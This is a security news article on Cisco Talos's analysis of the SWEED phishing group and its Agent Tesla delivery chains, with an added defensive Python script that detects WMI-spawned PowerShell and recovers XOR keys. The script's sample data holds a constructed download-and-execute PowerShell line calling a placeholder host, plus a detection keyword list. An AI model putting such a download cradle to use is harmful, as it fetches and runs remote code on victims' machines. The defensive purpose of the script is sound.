Cisco Talos has published a detailed examination of Sweed, a threat actor that has been active for more than two years, using spearphishing emails with malicious attachments to spread Formbook, Lokibot and Agent Tesla.
Cisco Talos researcher Edmund Brumaghin said for the most part Agent Tesla is the group’s favorite flavor of malware, but noted Sweed has used a variety of delivery methods since 2017.
The first, used in 2017, had Sweed place a dropper for Agent Tesla inside a .zip archive and attach it to an email claiming to contain a purchase order. The packer was written in .NET and used steganography to hide and decode a second .NET executable, which used the same technique to retrieve the final Agent Tesla payload, Brumaghin wrote.
Then in January 2018 Sweed moved on to Java-based droppers, again attached to emails claiming to contain a purchase or order of some type. The next change came in April 2018, when Sweed began exploiting the previously known CVE-2017-8759, a remote code execution vulnerability in the Microsoft .NET Framework delivered through malicious PowerPoint files: code placed inside a slide triggers the flaw when the document is opened.
The next month Sweed moved on to another remote code execution flaw, CVE-2017-11882 in the Office Equation Editor component, this time embedded in fake invoices that again downloaded Agent Tesla.
In 2019 Sweed continued to use Office, but instead of exploiting a vulnerability it turned to Office macros, delivered in email attachments posing as product orders. One chain begins with an obfuscated VBA macro that launches a PowerShell script through a WMI call, with the PowerShell script itself camouflaged using XOR operations. Once decoded, the script is revealed to be .NET code that performs a couple of checks, then downloads and executes what turns out to be an AutoIT-compiled script.
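The macro chain above leaves two artifacts a defender can work with: PowerShell started by WMI has the WMI provider host, not the Office process, as its parent, and a single-byte XOR layer can be stripped without knowing the key by trying all 256 keys and keeping the one that yields PowerShell-looking text. The following triage script is an added example written for this article, not code from Cisco Talos or from Sweed's tooling; the process-creation events, the second-stage script, the XOR key and the example.invalid hostname are all constructed here for illustration.

```python
"""
Triage helper for the macro chain described above: a Word macro launches
PowerShell through WMI, and the PowerShell stage is XOR-camouflaged.

Added example, not Cisco Talos or SWEED code. The process events, the
second-stage script and the XOR key below are constructed for illustration.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# --- Stage 1: PowerShell whose parent is the WMI provider host --------------
# When a macro calls Win32_Process.Create, WmiPrvSE.exe (not WINWORD.EXE)
# becomes the parent of the new process, which is the lineage we hunt for.

def wmi_spawned_powershell(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return process-creation events where powershell.exe was started by WmiPrvSE.exe."""
    hits = []
    for ev in events:
        image = ev["image"].lower()
        parent = ev["parent_image"].lower()
        if image.endswith(("powershell.exe", "pwsh.exe")) and parent.endswith("wmiprvse.exe"):
            hits.append(ev)
    return hits

# --- Stage 2: brute-force a single-byte XOR key on the embedded blob --------

# Multi-character tokens typical of PowerShell downloaders; a wrong key will
# almost never produce one of these by accident (matching is case-sensitive).
PS_KEYWORDS = (b"New-Object", b"DownloadString", b"IEX", b"Invoke-Expression",
               b"FromBase64String", b"Add-Type", b"Net.WebClient", b"-join")

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key (the camouflage the article describes)."""
    return bytes(b ^ key for b in data)

def score_powershell(candidate: bytes) -> int:
    """0 unless at least 95% of the bytes are printable; otherwise 1 plus 10 per keyword hit."""
    if not candidate:
        return 0
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in candidate)
    if printable < 0.95 * len(candidate):
        return 0
    return 1 + 10 * sum(candidate.count(k) for k in PS_KEYWORDS)

def recover_xor_key(blob: bytes) -> Optional[int]:
    """Try all 256 keys and return the one whose output looks most like PowerShell."""
    best_key, best_score = None, 0
    for key in range(256):
        s = score_powershell(xor_bytes(blob, key))
        if s > best_score:
            best_key, best_score = key, s
    return best_key

def extract_blob(cmdline: str) -> Optional[bytes]:
    """Pull the Base64 literal handed to FromBase64String out of a command line."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", cmdline)
    return base64.b64decode(m.group(1)) if m else None

def triage(events: List[Dict[str, str]]) -> List[Tuple[int, Optional[int], Optional[str]]]:
    """For each WMI-spawned PowerShell: (pid, recovered key, decoded second stage)."""
    out = []
    for ev in wmi_spawned_powershell(events):
        blob = extract_blob(ev["cmdline"])
        key = recover_xor_key(blob) if blob else None
        decoded = xor_bytes(blob, key).decode("ascii", "replace") if key is not None else None
        out.append((ev["pid"], key, decoded))
    return out

# --- Constructed sample data (hypothetical; example.invalid never resolves) --
STAGE2_PLAINTEXT = b"$c=New-Object Net.WebClient;IEX $c.DownloadString('http://example.invalid/u.ps1')"
SECRET_KEY = 0x5A  # used only to build the sample; the decoder never reads it
ENCODED_BLOB = base64.b64encode(xor_bytes(STAGE2_PLAINTEXT, SECRET_KEY)).decode()

SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Purchase_Order_4471.doc"'},
    {"pid": 5288, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 5304, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     # The key is not in the command line ($k is set earlier by the macro), so it must be recovered.
     "cmdline": "powershell.exe -w hidden -nop -c \"$b=[Convert]::FromBase64String('" + ENCODED_BLOB
                + "');IEX(-join($b|%{[char]($_ -bxor $k)}))\""},
    {"pid": 5310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Process"},  # benign: launched by the user, not by WMI
]

if __name__ == "__main__":
    for pid, key, script in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: key {key:#04x}" if key is not None else f"pid {pid}: no key", script)
```

Only the PowerShell process parented by WmiPrvSE.exe is flagged; the user-launched one is ignored. The key recovery relies on the decoded stage containing recognisable PowerShell tokens, so the keyword list should be extended with whatever the real sample uses, and a multi-byte or rolling XOR key would need a longer search than the 256 candidates tried here.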
Sweed's operation has no regional focus; it attacks countries across the globe, including the U.S., Canada, Russia, China, Singapore and South Africa. Nor are the threat actors zeroed in on any particular industry, hitting primarily logistics and manufacturing entities, with a sprinkling of energy and defense companies for good measure.
Talos was also able to identify an actor on several forums who went by Sweed or Swee D, and actively interacted with that person. The individual claimed to be an ethical hacker, but further investigation found a person with the same name in a forum working with stolen credit card information.
Because these identities were found with relative ease and many of the tools used come from easily obtained kits, Brumaghin described Sweed as likely an amateur.
“Based on the TTPs used by this group, SWEED should be considered a relatively amateur actor. They use well-known vulnerabilities, commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and appear to rely on kits readily available on hacking forums. SWEED consistently leverages packing and crypting in order to minimize detection by anti-malware solutions,” he said.